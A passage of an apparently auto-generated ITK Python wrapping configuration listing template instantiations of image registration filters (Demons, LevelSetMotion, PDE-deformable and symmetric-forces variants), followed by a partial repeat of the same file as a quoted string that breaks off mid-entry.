('PDEDeformableRegistrationFilter', 'itk::PDEDeformableRegistrationFilter', 'itkPDEDeformableRegistrationFilterIF2IF2IVF22', True, 'itk::Image< float,2 >, itk::Image< float,2 >, itk::Image< itk::Vector< float,2 >,2 >'),
('PDEDeformableRegistrationFilter', 'itk::PDEDeformableRegistrationFilter', 'itkPDEDeformableRegistrationFilterIF3IF3IVF23', True, 'itk::Image< float,3 >, itk::Image< float,3 >, itk::Image< itk::Vector< float,2 >,3 >'),
('PDEDeformableRegistrationFilter', 'itk::PDEDeformableRegistrationFilter', 'itkPDEDeformableRegistrationFilterIF2IF2IVF32', True, 'itk::Image< float,2 >, itk::Image< float,2 >, itk::Image< itk::Vector< float,3 >,2 >'),
('PDEDeformableRegistrationFilter', 'itk::PDEDeformableRegistrationFilter', 'itkPDEDeformableRegistrationFilterIF3IF3IVF33', True, 'itk::Image< float,3 >, itk::Image< float,3 >, itk::Image< itk::Vector< float,3 >,3 >'),
('PDEDeformableRegistrationFilter', 'itk::PDEDeformableRegistrationFilter', 'itkPDEDeformableRegistrationFilterIF2IF2IVF42', True, 'itk::Image< float,2 >, itk::Image< float,2 >, itk::Image< itk::Vector< float,4 >,2 >'),
('PDEDeformableRegistrationFilter', 'itk::PDEDeformableRegistrationFilter', 'itkPDEDeformableRegistrationFilterIF3IF3IVF43', True, 'itk::Image< float,3 >, itk::Image< float,3 >, itk::Image< itk::Vector< float,4 >,3 >'),
('SymmetricForcesDemonsRegistrationFilter', 'itk::SymmetricForcesDemonsRegistrationFilter', 'itkSymmetricForcesDemonsRegistrationFilterISS2ISS2IVF22', True, 'itk::Image< signed short,2 >, itk::Image< signed short,2 >, itk::Image< itk::Vector< float,2 >,2 >'),
('SymmetricForcesDemonsRegistrationFilter', 'itk::SymmetricForcesDemonsRegistrationFilter', 'itkSymmetricForcesDemonsRegistrationFilterISS3ISS3IVF23', True, 'itk::Image< signed short,3 >, itk::Image< signed short,3 >, itk::Image< itk::Vector< float,2 >,3 >'),
('SymmetricForcesDemonsRegistrationFilter', 'itk::SymmetricForcesDemonsRegistrationFilter', 'itkSymmetricForcesDemonsRegistrationFilterISS2ISS2IVF32', True, 'itk::Image< signed short,2 >, itk::Image< signed short,2 >, itk::Image< itk::Vector< float,3 >,2 >'),
('SymmetricForcesDemonsRegistrationFilter', 'itk::SymmetricForcesDemonsRegistrationFilter', 'itkSymmetricForcesDemonsRegistrationFilterISS3ISS3IVF33', True, 'itk::Image< signed short,3 >, itk::Image< signed short,3 >, itk::Image< itk::Vector< float,3 >,3 >'),
('SymmetricForcesDemonsRegistrationFilter', 'itk::SymmetricForcesDemonsRegistrationFilter', 'itkSymmetricForcesDemonsRegistrationFilterISS2ISS2IVF42', True, 'itk::Image< signed short,2 >, itk::Image< signed short,2 >, itk::Image< itk::Vector< float,4 >,2 >'),
('SymmetricForcesDemonsRegistrationFilter', 'itk::SymmetricForcesDemonsRegistrationFilter', 'itkSymmetricForcesDemonsRegistrationFilterISS3ISS3IVF43', True, 'itk::Image< signed short,3 >, itk::Image< signed short,3 >, itk::Image< itk::Vector< float,4 >,3 >'),
('SymmetricForcesDemonsRegistrationFilter', 'itk::SymmetricForcesDemonsRegistrationFilter', 'itkSymmetricForcesDemonsRegistrationFilterIUC2IUC2IVF22', True, 'itk::Image< unsigned char,2 >, itk::Image< unsigned char,2 >, itk::Image< itk::Vector< float,2 >,2 >'),
('SymmetricForcesDemonsRegistrationFilter', 'itk::SymmetricForcesDemonsRegistrationFilter', 'itkSymmetricForcesDemonsRegistrationFilterIUC3IUC3IVF23', True, 'itk::Image< unsigned char,3 >, itk::Image< unsigned char,3 >, itk::Image< itk::Vector< float,2 >,3 >'),
('SymmetricForcesDemonsRegistrationFilter', 'itk::SymmetricForcesDemonsRegistrationFilter', 'itkSymmetricForcesDemonsRegistrationFilterIUC2IUC2IVF32', True, 'itk::Image< unsigned char,2 >, itk::Image< unsigned char,2 >, itk::Image< itk::Vector< float,3 >,2 >'),
('SymmetricForcesDemonsRegistrationFilter', 'itk::SymmetricForcesDemonsRegistrationFilter', 'itkSymmetricForcesDemonsRegistrationFilterIUC3IUC3IVF33', True, 'itk::Image< unsigned char,3 >, itk::Image< unsigned char,3 >, itk::Image< itk::Vector< float,3 >,3 >'),
('SymmetricForcesDemonsRegistrationFilter', 'itk::SymmetricForcesDemonsRegistrationFilter', 'itkSymmetricForcesDemonsRegistrationFilterIUC2IUC2IVF42', True, 'itk::Image< unsigned char,2 >, itk::Image< unsigned char,2 >, itk::Image< itk::Vector< float,4 >,2 >'),
('SymmetricForcesDemonsRegistrationFilter', 'itk::SymmetricForcesDemonsRegistrationFilter', 'itkSymmetricForcesDemonsRegistrationFilterIUC3IUC3IVF43', True, 'itk::Image< unsigned char,3 >, itk::Image< unsigned char,3 >, itk::Image< itk::Vector< float,4 >,3 >'),
('SymmetricForcesDemonsRegistrationFilter', 'itk::SymmetricForcesDemonsRegistrationFilter', 'itkSymmetricForcesDemonsRegistrationFilterIUS2IUS2IVF22', True, 'itk::Image< unsigned short,2 >, itk::Image< unsigned short,2 >, itk::Image< itk::Vector< float,2 >,2 >'),
('SymmetricForcesDemonsRegistrationFilter', 'itk::SymmetricForcesDemonsRegistrationFilter', 'itkSymmetricForcesDemonsRegistrationFilterIUS3IUS3IVF23', True, 'itk::Image< unsigned short,3 >, itk::Image< unsigned short,3 >, itk::Image< itk::Vector< float,2 >,3 >'),
('SymmetricForcesDemonsRegistrationFilter', 'itk::SymmetricForcesDemonsRegistrationFilter', 'itkSymmetricForcesDemonsRegistrationFilterIUS2IUS2IVF32', True, 'itk::Image< unsigned short,2 >, itk::Image< unsigned short,2 >, itk::Image< itk::Vector< float,3 >,2 >'),
('SymmetricForcesDemonsRegistrationFilter', 'itk::SymmetricForcesDemonsRegistrationFilter', 'itkSymmetricForcesDemonsRegistrationFilterIUS3IUS3IVF33', True, 'itk::Image< unsigned short,3 >, itk::Image< unsigned short,3 >, itk::Image< itk::Vector< float,3 >,3 >'),
('SymmetricForcesDemonsRegistrationFilter', 'itk::SymmetricForcesDemonsRegistrationFilter', 'itkSymmetricForcesDemonsRegistrationFilterIUS2IUS2IVF42', True, 'itk::Image< unsigned short,2 >, itk::Image< unsigned short,2 >, itk::Image< itk::Vector< float,4 >,2 >'),
('SymmetricForcesDemonsRegistrationFilter', 'itk::SymmetricForcesDemonsRegistrationFilter', 'itkSymmetricForcesDemonsRegistrationFilterIUS3IUS3IVF43', True, 'itk::Image< unsigned short,3 >, itk::Image< unsigned short,3 >, itk::Image< itk::Vector< float,4 >,3 >'),
('SymmetricForcesDemonsRegistrationFilter', 'itk::SymmetricForcesDemonsRegistrationFilter', 'itkSymmetricForcesDemonsRegistrationFilterIF2IF2IVF22', True, 'itk::Image< float,2 >, itk::Image< float,2 >, itk::Image< itk::Vector< float,2 >,2 >'),
('SymmetricForcesDemonsRegistrationFilter', 'itk::SymmetricForcesDemonsRegistrationFilter', 'itkSymmetricForcesDemonsRegistrationFilterIF3IF3IVF23', True, 'itk::Image< float,3 >, itk::Image< float,3 >, itk::Image< itk::Vector< float,2 >,3 >'),
('SymmetricForcesDemonsRegistrationFilter', 'itk::SymmetricForcesDemonsRegistrationFilter', 'itkSymmetricForcesDemonsRegistrationFilterIF2IF2IVF32', True, 'itk::Image< float,2 >, itk::Image< float,2 >, itk::Image< itk::Vector< float,3 >,2 >'),
('SymmetricForcesDemonsRegistrationFilter', 'itk::SymmetricForcesDemonsRegistrationFilter', 'itkSymmetricForcesDemonsRegistrationFilterIF3IF3IVF33', True, 'itk::Image< float,3 >, itk::Image< float,3 >, itk::Image< itk::Vector< float,3 >,3 >'),
('SymmetricForcesDemonsRegistrationFilter', 'itk::SymmetricForcesDemonsRegistrationFilter', 'itkSymmetricForcesDemonsRegistrationFilterIF2IF2IVF42', True, 'itk::Image< float,2 >, itk::Image< float,2 >, itk::Image< itk::Vector< float,4 >,2 >'),
('SymmetricForcesDemonsRegistrationFilter', 'itk::SymmetricForcesDemonsRegistrationFilter', 'itkSymmetricForcesDemonsRegistrationFilterIF3IF3IVF43', True, 'itk::Image< float,3 >, itk::Image< float,3 >, itk::Image< itk::Vector< float,4 >,3 >'),
)
snake_case_functions = ('level_set_motion_registration_filter', 'pde_deformable_registration_filter', 'symmetric_forces_demons_registration_filter', 'demons_registration_filter', 'multi_resolution_pde_deformable_registration', )
| [
"depends = ('ITKPyBase', 'ITKRegistrationCommon', 'ITKFiniteDifference', )\ntemplates = (\n ('DemonsRegistrationFilter', 'itk::DemonsRegistrationFilter', 'itkDemonsRegistrationFilterISS2ISS2IVF22', True, 'itk::Image< signed short,2 >, itk::Image< signed short,2 >, itk::Image< itk::Vector< float,2 >,2 >'),\n ('DemonsRegistrationFilter', 'itk::DemonsRegistrationFilter', 'itkDemonsRegistrationFilterISS3ISS3IVF23', True, 'itk::Image< signed short,3 >, itk::Image< signed short,3 >, itk::Image< itk::Vector< float,2 >,3 >'),\n ('DemonsRegistrationFilter', 'itk::DemonsRegistrationFilter', 'itkDemonsRegistrationFilterISS2ISS2IVF32', True, 'itk::Image< signed short,2 >, itk::Image< signed short,2 >, itk::Image< itk::Vector< float,3 >,2 >'),\n ('DemonsRegistrationFilter', 'itk::DemonsRegistrationFilter', 'itkDemonsRegistrationFilterISS3ISS3IVF33', True, 'itk::Image< signed short,3 >, itk::Image< signed short,3 >, itk::Image< itk::Vector< float,3 >,3 >'),\n ('DemonsRegistrationFilter', 'itk::DemonsRegistrationFilter', 'itkDemonsRegistrationFilterISS2ISS2IVF42', True, 'itk::Image< signed short,2 >, itk::Image< signed short,2 >, itk::Image< itk::Vector< float,4 >,2 >'),\n ('DemonsRegistrationFilter', 'itk::DemonsRegistrationFilter', 'itkDemonsRegistrationFilterISS3ISS3IVF43', True, 'itk::Image< signed short,3 >, itk::Image< signed short,3 >, itk::Image< itk::Vector< float,4 >,3 >'),\n ('DemonsRegistrationFilter', 'itk::DemonsRegistrationFilter', 'itkDemonsRegistrationFilterIUC2IUC2IVF22', True, 'itk::Image< unsigned char,2 >, itk::Image< unsigned char,2 >, itk::Image< itk::Vector< float,2 >,2 >'),\n ('DemonsRegistrationFilter', 'itk::DemonsRegistrationFilter', 'itkDemonsRegistrationFilterIUC3IUC3IVF23', True, 'itk::Image< unsigned char,3 >, itk::Image< unsigned char,3 >, itk::Image< itk::Vector< float,2 >,3 >'),\n ('DemonsRegistrationFilter', 'itk::DemonsRegistrationFilter', 'itkDemonsRegistrationFilterIUC2IUC2IVF32', True, 'itk::Image< unsigned char,2 >, itk::Image< unsigned char,2 >, itk::Image< itk::Vector< float,3 >,2 >'),\n ('DemonsRegistrationFilter', 'itk::DemonsRegistrationFilter', 'itkDemonsRegistrationFilterIUC3IUC3IVF33', True, 'itk::Image< unsigned char,3 >, itk::Image< unsigned char,3 >, itk::Image< itk::Vector< float,3 >,3 >'),\n ('DemonsRegistrationFilter', 'itk::DemonsRegistrationFilter', 'itkDemonsRegistrationFilterIUC2IUC2IVF42', True, 'itk::Image< unsigned char,2 >, itk::Image< unsigned char,2 >, itk::Image< itk::Vector< float,4 >,2 >'),\n ('DemonsRegistrationFilter', 'itk::DemonsRegistrationFilter', 'itkDemonsRegistrationFilterIUC3IUC3IVF43', True, 'itk::Image< unsigned char,3 >, itk::Image< unsigned char,3 >, itk::Image< itk::Vector< float,4 >,3 >'),\n ('DemonsRegistrationFilter', 'itk::DemonsRegistrationFilter', 'itkDemonsRegistrationFilterIUS2IUS2IVF22', True, 'itk::Image< unsigned short,2 >, itk::Image< unsigned short,2 >, itk::Image< itk::Vector< float,2 >,2 >'),\n ('DemonsRegistrationFilter', 'itk::DemonsRegistrationFilter', 'itkDemonsRegistrationFilterIUS3IUS3IVF23', True, 'itk::Image< unsigned short,3 >, itk::Image< unsigned short,3 >, itk::Image< itk::Vector< float,2 >,3 >'),\n ('DemonsRegistrationFilter', 'itk::DemonsRegistrationFilter', 'itkDemonsRegistrationFilterIUS2IUS2IVF32', True, 'itk::Image< unsigned short,2 >, itk::Image< unsigned short,2 >, itk::Image< itk::Vector< float,3 >,2 >'),\n ('DemonsRegistrationFilter', 'itk::DemonsRegistrationFilter', 'itkDemonsRegistrationFilterIUS3IUS3IVF33', True, 'itk::Image< unsigned short,3 >, itk::Image< unsigned short,3 >, 
itk::Image< itk::Vector< float,3 >,3 >'),\n ('DemonsRegistrationFilter', 'itk::DemonsRegistrationFilter', 'itkDemonsRegistrationFilterIUS2IUS2IVF42', True, 'itk::Image< unsigned short,2 >, itk::Image< unsigned short,2 >, itk::Image< itk::Vector< float,4 >,2 >'),\n ('DemonsRegistrationFilter', 'itk::DemonsRegistrationFilter', 'itkDemonsRegistrationFilterIUS3IUS3IVF43', True, 'itk::Image< unsigned short,3 >, itk::Image< unsigned short,3 >, itk::Image< itk::Vector< float,4 >,3 >'),\n ('DemonsRegistrationFilter', 'itk::DemonsRegistrationFilter', 'itkDemonsRegistrationFilterIF2IF2IVF22', True, 'itk::Image< float,2 >, itk::Image< float,2 >, itk::Image< itk::Vector< float,2 >,2 >'),\n ('DemonsRegistrationFilter', 'itk::DemonsRegistrationFilter', 'itkDemonsRegistrationFilterIF3IF3IVF23', True, 'itk::Image< float,3 >, itk::Image< float,3 >, itk::Image< itk::Vector< float,2 >,3 >'),\n ('DemonsRegistrationFilter', 'itk::DemonsRegistrationFilter', 'itkDemonsRegistrationFilterIF2IF2IVF32', True, 'itk::Image< float,2 >, itk::Image< float,2 >, itk::Image< itk::Vector< float,3 >,2 >'),\n ('DemonsRegistrationFilter', 'itk::DemonsRegistrationFilter', 'itkDemonsRegistrationFilterIF3IF3IVF33', True, 'itk::Image< float,3 >, itk::Image< float,3 >, itk::Image< itk::Vector< float,3 >,3 >'),\n ('DemonsRegistrationFilter', 'itk::DemonsRegistrationFilter', 'itkDemonsRegistrationFilterIF2IF2IVF42', True, 'itk::Image< float,2 >, itk::Image< float,2 >, itk::Image< itk::Vector< float,4 >,2 >'),\n ('DemonsRegistrationFilter', 'itk::DemonsRegistrationFilter', 'itkDemonsRegistrationFilterIF3IF3IVF43', True, 'itk::Image< float,3 >, itk::Image< float,3 >, itk::Image< itk::Vector< float,4 >,3 >'),\n ('LevelSetMotionRegistrationFilter', 'itk::LevelSetMotionRegistrationFilter', 'itkLevelSetMotionRegistrationFilterISS2ISS2IVF22', True, 'itk::Image< signed short,2 >, itk::Image< signed short,2 >, itk::Image< itk::Vector< float,2 >,2 >'),\n ('LevelSetMotionRegistrationFilter', 'itk::LevelSetMotionRegistrationFilter', 'itkLevelSetMotionRegistrationFilterISS3ISS3IVF23', True, 'itk::Image< signed short,3 >, itk::Image< signed short,3 >, itk::Image< itk::Vector< float,2 >,3 >'),\n ('LevelSetMotionRegistrationFilter', 'itk::LevelSetMotionRegistrationFilter', 'itkLevelSetMotionRegistrationFilterISS2ISS2IVF32', True, 'itk::Image< signed short,2 >, itk::Image< signed short,2 >, itk::Image< itk::Vector< float,3 >,2 >'),\n ('LevelSetMotionRegistrationFilter', 'itk::LevelSetMotionRegistrationFilter', 'itkLevelSetMotionRegistrationFilterISS3ISS3IVF33', True, 'itk::Image< signed short,3 >, itk::Image< signed short,3 >, itk::Image< itk::Vector< float,3 >,3 >'),\n ('LevelSetMotionRegistrationFilter', 'itk::LevelSetMotionRegistrationFilter', 'itkLevelSetMotionRegistrationFilterISS2ISS2IVF42', True, 'itk::Image< signed short,2 >, itk::Image< signed short,2 >, itk::Image< itk::Vector< float,4 >,2 >'),\n ('LevelSetMotionRegistrationFilter', 'itk::LevelSetMotionRegistrationFilter', 'itkLevelSetMotionRegistrationFilterISS3ISS3IVF43', True, 'itk::Image< signed short,3 >, itk::Image< signed short,3 >, itk::Image< itk::Vector< float,4 >,3 >'),\n ('LevelSetMotionRegistrationFilter', 'itk::LevelSetMotionRegistrationFilter', 'itkLevelSetMotionRegistrationFilterIUC2IUC2IVF22', True, 'itk::Image< unsigned char,2 >, itk::Image< unsigned char,2 >, itk::Image< itk::Vector< float,2 >,2 >'),\n ('LevelSetMotionRegistrationFilter', 'itk::LevelSetMotionRegistrationFilter', 'itkLevelSetMotionRegistrationFilterIUC3IUC3IVF23', True, 'itk::Image< unsigned char,3 >, 
itk::Image< unsigned char,3 >, itk::Image< itk::Vector< float,2 >,3 >'),\n ('LevelSetMotionRegistrationFilter', 'itk::LevelSetMotionRegistrationFilter', 'itkLevelSetMotionRegistrationFilterIUC2IUC2IVF32', True, 'itk::Image< unsigned char,2 >, itk::Image< unsigned char,2 >, itk::Image< itk::Vector< float,3 >,2 >'),\n ('LevelSetMotionRegistrationFilter', 'itk::LevelSetMotionRegistrationFilter', 'itkLevelSetMotionRegistrationFilterIUC3IUC3IVF33', True, 'itk::Image< unsigned char,3 >, itk::Image< unsigned char,3 >, itk::Image< itk::Vector< float,3 >,3 >'),\n ('LevelSetMotionRegistrationFilter', 'itk::LevelSetMotionRegistrationFilter', 'itkLevelSetMotionRegistrationFilterIUC2IUC2IVF42', True, 'itk::Image< unsigned char,2 >, itk::Image< unsigned char,2 >, itk::Image< itk::Vector< float,4 >,2 >'),\n ('LevelSetMotionRegistrationFilter', 'itk::LevelSetMotionRegistrationFilter', 'itkLevelSetMotionRegistrationFilterIUC3IUC3IVF43', True, 'itk::Image< unsigned char,3 >, itk::Image< unsigned char,3 >, itk::Image< itk::Vector< float,4 >,3 >'),\n ('LevelSetMotionRegistrationFilter', 'itk::LevelSetMotionRegistrationFilter', 'itkLevelSetMotionRegistrationFilterIUS2IUS2IVF22', True, 'itk::Image< unsigned short,2 >, itk::Image< unsigned short,2 >, itk::Image< itk::Vector< float,2 >,2 >'),\n ('LevelSetMotionRegistrationFilter', 'itk::LevelSetMotionRegistrationFilter', 'itkLevelSetMotionRegistrationFilterIUS3IUS3IVF23', True, 'itk::Image< unsigned short,3 >, itk::Image< unsigned short,3 >, itk::Image< itk::Vector< float,2 >,3 >'),\n ('LevelSetMotionRegistrationFilter', 'itk::LevelSetMotionRegistrationFilter', 'itkLevelSetMotionRegistrationFilterIUS2IUS2IVF32', True, 'itk::Image< unsigned short,2 >, itk::Image< unsigned short,2 >, itk::Image< itk::Vector< float,3 >,2 >'),\n ('LevelSetMotionRegistrationFilter', 'itk::LevelSetMotionRegistrationFilter', 'itkLevelSetMotionRegistrationFilterIUS3IUS3IVF33', True, 'itk::Image< unsigned short,3 >, itk::Image< unsigned short,3 >, itk::Image< itk::Vector< float,3 >,3 >'),\n ('LevelSetMotionRegistrationFilter', 'itk::LevelSetMotionRegistrationFilter', 'itkLevelSetMotionRegistrationFilterIUS2IUS2IVF42', True, 'itk::Image< unsigned short,2 >, itk::Image< unsigned short,2 >, itk::Image< itk::Vector< float,4 >,2 >'),\n ('LevelSetMotionRegistrationFilter', 'itk::LevelSetMotionRegistrationFilter', 'itkLevelSetMotionRegistrationFilterIUS3IUS3IVF43', True, 'itk::Image< unsigned short,3 >, itk::Image< unsigned short,3 >, itk::Image< itk::Vector< float,4 >,3 >'),\n ('LevelSetMotionRegistrationFilter', 'itk::LevelSetMotionRegistrationFilter', 'itkLevelSetMotionRegistrationFilterIF2IF2IVF22', True, 'itk::Image< float,2 >, itk::Image< float,2 >, itk::Image< itk::Vector< float,2 >,2 >'),\n ('LevelSetMotionRegistrationFilter', 'itk::LevelSetMotionRegistrationFilter', 'itkLevelSetMotionRegistrationFilterIF3IF3IVF23', True, 'itk::Image< float,3 >, itk::Image< float,3 >, itk::Image< itk::Vector< float,2 >,3 >'),\n ('LevelSetMotionRegistrationFilter', 'itk::LevelSetMotionRegistrationFilter', 'itkLevelSetMotionRegistrationFilterIF2IF2IVF32', True, 'itk::Image< float,2 >, itk::Image< float,2 >, itk::Image< itk::Vector< float,3 >,2 >'),\n ('LevelSetMotionRegistrationFilter', 'itk::LevelSetMotionRegistrationFilter', 'itkLevelSetMotionRegistrationFilterIF3IF3IVF33', True, 'itk::Image< float,3 >, itk::Image< float,3 >, itk::Image< itk::Vector< float,3 >,3 >'),\n ('LevelSetMotionRegistrationFilter', 'itk::LevelSetMotionRegistrationFilter', 'itkLevelSetMotionRegistrationFilterIF2IF2IVF42', True, 
'itk::Image< float,2 >, itk::Image< float,2 >, itk::Image< itk::Vector< float,4 >,2 >'),\n ('LevelSetMotionRegistrationFilter', 'itk::LevelSetMotionRegistrationFilter', 'itkLevelSetMotionRegistrationFilterIF3IF3IVF43', True, 'itk::Image< float,3 >, itk::Image< float,3 >, itk::Image< itk::Vector< float,4 >,3 >'),\n ('MultiResolutionPDEDeformableRegistration', 'itk::MultiResolutionPDEDeformableRegistration', 'itkMultiResolutionPDEDeformableRegistrationIF2IF2IVF22F', True, 'itk::Image< float,2 >, itk::Image< float,2 >, itk::Image< itk::Vector< float,2 >, 2 >, float'),\n ('MultiResolutionPDEDeformableRegistration', 'itk::MultiResolutionPDEDeformableRegistration', 'itkMultiResolutionPDEDeformableRegistrationIF3IF3IVF33F', True, 'itk::Image< float,3 >, itk::Image< float,3 >, itk::Image< itk::Vector< float,3 >, 3 >, float'),\n ('PDEDeformableRegistrationFilter', 'itk::PDEDeformableRegistrationFilter', 'itkPDEDeformableRegistrationFilterISS2ISS2IVF22', True, 'itk::Image< signed short,2 >, itk::Image< signed short,2 >, itk::Image< itk::Vector< float,2 >,2 >'),\n ('PDEDeformableRegistrationFilter', 'itk::PDEDeformableRegistrationFilter', 'itkPDEDeformableRegistrationFilterISS3ISS3IVF23', True, 'itk::Image< signed short,3 >, itk::Image< signed short,3 >, itk::Image< itk::Vector< float,2 >,3 >'),\n ('PDEDeformableRegistrationFilter', 'itk::PDEDeformableRegistrationFilter', 'itkPDEDeformableRegistrationFilterISS2ISS2IVF32', True, 'itk::Image< signed short,2 >, itk::Image< signed short,2 >, itk::Image< itk::Vector< float,3 >,2 >'),\n ('PDEDeformableRegistrationFilter', 'itk::PDEDeformableRegistrationFilter', 'itkPDEDeformableRegistrationFilterISS3ISS3IVF33', True, 'itk::Image< signed short,3 >, itk::Image< signed short,3 >, itk::Image< itk::Vector< float,3 >,3 >'),\n ('PDEDeformableRegistrationFilter', 'itk::PDEDeformableRegistrationFilter', 'itkPDEDeformableRegistrationFilterISS2ISS2IVF42', True, 'itk::Image< signed short,2 >, itk::Image< signed short,2 >, itk::Image< itk::Vector< float,4 >,2 >'),\n ('PDEDeformableRegistrationFilter', 'itk::PDEDeformableRegistrationFilter', 'itkPDEDeformableRegistrationFilterISS3ISS3IVF43', True, 'itk::Image< signed short,3 >, itk::Image< signed short,3 >, itk::Image< itk::Vector< float,4 >,3 >'),\n ('PDEDeformableRegistrationFilter', 'itk::PDEDeformableRegistrationFilter', 'itkPDEDeformableRegistrationFilterIUC2IUC2IVF22', True, 'itk::Image< unsigned char,2 >, itk::Image< unsigned char,2 >, itk::Image< itk::Vector< float,2 >,2 >'),\n ('PDEDeformableRegistrationFilter', 'itk::PDEDeformableRegistrationFilter', 'itkPDEDeformableRegistrationFilterIUC3IUC3IVF23', True, 'itk::Image< unsigned char,3 >, itk::Image< unsigned char,3 >, itk::Image< itk::Vector< float,2 >,3 >'),\n ('PDEDeformableRegistrationFilter', 'itk::PDEDeformableRegistrationFilter', 'itkPDEDeformableRegistrationFilterIUC2IUC2IVF32', True, 'itk::Image< unsigned char,2 >, itk::Image< unsigned char,2 >, itk::Image< itk::Vector< float,3 >,2 >'),\n ('PDEDeformableRegistrationFilter', 'itk::PDEDeformableRegistrationFilter', 'itkPDEDeformableRegistrationFilterIUC3IUC3IVF33', True, 'itk::Image< unsigned char,3 >, itk::Image< unsigned char,3 >, itk::Image< itk::Vector< float,3 >,3 >'),\n ('PDEDeformableRegistrationFilter', 'itk::PDEDeformableRegistrationFilter', 'itkPDEDeformableRegistrationFilterIUC2IUC2IVF42', True, 'itk::Image< unsigned char,2 >, itk::Image< unsigned char,2 >, itk::Image< itk::Vector< float,4 >,2 >'),\n ('PDEDeformableRegistrationFilter', 'itk::PDEDeformableRegistrationFilter', 
'itkPDEDeformableRegistrationFilterIUC3IUC3IVF43', True, 'itk::Image< unsigned char,3 >, itk::Image< unsigned char,3 >, itk::Image< itk::Vector< float,4 >,3 >'),\n ('PDEDeformableRegistrationFilter', 'itk::PDEDeformableRegistrationFilter', 'itkPDEDeformableRegistrationFilterIUS2IUS2IVF22', True, 'itk::Image< unsigned short,2 >, itk::Image< unsigned short,2 >, itk::Image< itk::Vector< float,2 >,2 >'),\n ('PDEDeformableRegistrationFilter', 'itk::PDEDeformableRegistrationFilter', 'itkPDEDeformableRegistrationFilterIUS3IUS3IVF23', True, 'itk::Image< unsigned short,3 >, itk::Image< unsigned short,3 >, itk::Image< itk::Vector< float,2 >,3 >'),\n ('PDEDeformableRegistrationFilter', 'itk::PDEDeformableRegistrationFilter', 'itkPDEDeformableRegistrationFilterIUS2IUS2IVF32', True, 'itk::Image< unsigned short,2 >, itk::Image< unsigned short,2 >, itk::Image< itk::Vector< float,3 >,2 >'),\n ('PDEDeformableRegistrationFilter', 'itk::PDEDeformableRegistrationFilter', 'itkPDEDeformableRegistrationFilterIUS3IUS3IVF33', True, 'itk::Image< unsigned short,3 >, itk::Image< unsigned short,3 >, itk::Image< itk::Vector< float,3 >,3 >'),\n ('PDEDeformableRegistrationFilter', 'itk::PDEDeformableRegistrationFilter', 'itkPDEDeformableRegistrationFilterIUS2IUS2IVF42', True, 'itk::Image< unsigned short,2 >, itk::Image< unsigned short,2 >, itk::Image< itk::Vector< float,4 >,2 >'),\n ('PDEDeformableRegistrationFilter', 'itk::PDEDeformableRegistrationFilter', 'itkPDEDeformableRegistrationFilterIUS3IUS3IVF43', True, 'itk::Image< unsigned short,3 >, itk::Image< unsigned short,3 >, itk::Image< itk::Vector< float,4 >,3 >'),\n ('PDEDeformableRegistrationFilter', 'itk::PDEDeformableRegistrationFilter', 'itkPDEDeformableRegistrationFilterIF2IF2IVF22', True, 'itk::Image< float,2 >, itk::Image< float,2 >, itk::Image< itk::Vector< float,2 >,2 >'),\n ('PDEDeformableRegistrationFilter', 'itk::PDEDeformableRegistrationFilter', 'itkPDEDeformableRegistrationFilterIF3IF3IVF23', True, 'itk::Image< float,3 >, itk::Image< float,3 >, itk::Image< itk::Vector< float,2 >,3 >'),\n ('PDEDeformableRegistrationFilter', 'itk::PDEDeformableRegistrationFilter', 'itkPDEDeformableRegistrationFilterIF2IF2IVF32', True, 'itk::Image< float,2 >, itk::Image< float,2 >, itk::Image< itk::Vector< float,3 >,2 >'),\n ('PDEDeformableRegistrationFilter', 'itk::PDEDeformableRegistrationFilter', 'itkPDEDeformableRegistrationFilterIF3IF3IVF33', True, 'itk::Image< float,3 >, itk::Image< float,3 >, itk::Image< itk::Vector< float,3 >,3 >'),\n ('PDEDeformableRegistrationFilter', 'itk::PDEDeformableRegistrationFilter', 'itkPDEDeformableRegistrationFilterIF2IF2IVF42', True, 'itk::Image< float,2 >, itk::Image< float,2 >, itk::Image< itk::Vector< float,4 >,2 >'),\n ('PDEDeformableRegistrationFilter', 'itk::PDEDeformableRegistrationFilter', 'itkPDEDeformableRegistrationFilterIF3IF3IVF43', True, 'itk::Image< float,3 >, itk::Image< float,3 >, itk::Image< itk::Vector< float,4 >,3 >'),\n ('SymmetricForcesDemonsRegistrationFilter', 'itk::SymmetricForcesDemonsRegistrationFilter', 'itkSymmetricForcesDemonsRegistrationFilterISS2ISS2IVF22', True, 'itk::Image< signed short,2 >, itk::Image< signed short,2 >, itk::Image< itk::Vector< float,2 >,2 >'),\n ('SymmetricForcesDemonsRegistrationFilter', 'itk::SymmetricForcesDemonsRegistrationFilter', 'itkSymmetricForcesDemonsRegistrationFilterISS3ISS3IVF23', True, 'itk::Image< signed short,3 >, itk::Image< signed short,3 >, itk::Image< itk::Vector< float,2 >,3 >'),\n ('SymmetricForcesDemonsRegistrationFilter', 
'itk::SymmetricForcesDemonsRegistrationFilter', 'itkSymmetricForcesDemonsRegistrationFilterISS2ISS2IVF32', True, 'itk::Image< signed short,2 >, itk::Image< signed short,2 >, itk::Image< itk::Vector< float,3 >,2 >'),\n ('SymmetricForcesDemonsRegistrationFilter', 'itk::SymmetricForcesDemonsRegistrationFilter', 'itkSymmetricForcesDemonsRegistrationFilterISS3ISS3IVF33', True, 'itk::Image< signed short,3 >, itk::Image< signed short,3 >, itk::Image< itk::Vector< float,3 >,3 >'),\n ('SymmetricForcesDemonsRegistrationFilter', 'itk::SymmetricForcesDemonsRegistrationFilter', 'itkSymmetricForcesDemonsRegistrationFilterISS2ISS2IVF42', True, 'itk::Image< signed short,2 >, itk::Image< signed short,2 >, itk::Image< itk::Vector< float,4 >,2 >'),\n ('SymmetricForcesDemonsRegistrationFilter', 'itk::SymmetricForcesDemonsRegistrationFilter', 'itkSymmetricForcesDemonsRegistrationFilterISS3ISS3IVF43', True, 'itk::Image< signed short,3 >, itk::Image< signed short,3 >, itk::Image< itk::Vector< float,4 >,3 >'),\n ('SymmetricForcesDemonsRegistrationFilter', 'itk::SymmetricForcesDemonsRegistrationFilter', 'itkSymmetricForcesDemonsRegistrationFilterIUC2IUC2IVF22', True, 'itk::Image< unsigned char,2 >, itk::Image< unsigned char,2 >, itk::Image< itk::Vector< float,2 >,2 >'),\n ('SymmetricForcesDemonsRegistrationFilter', 'itk::SymmetricForcesDemonsRegistrationFilter', 'itkSymmetricForcesDemonsRegistrationFilterIUC3IUC3IVF23', True, 'itk::Image< unsigned char,3 >, itk::Image< unsigned char,3 >, itk::Image< itk::Vector< float,2 >,3 >'),\n ('SymmetricForcesDemonsRegistrationFilter', 'itk::SymmetricForcesDemonsRegistrationFilter', 'itkSymmetricForcesDemonsRegistrationFilterIUC2IUC2IVF32', True, 'itk::Image< unsigned char,2 >, itk::Image< unsigned 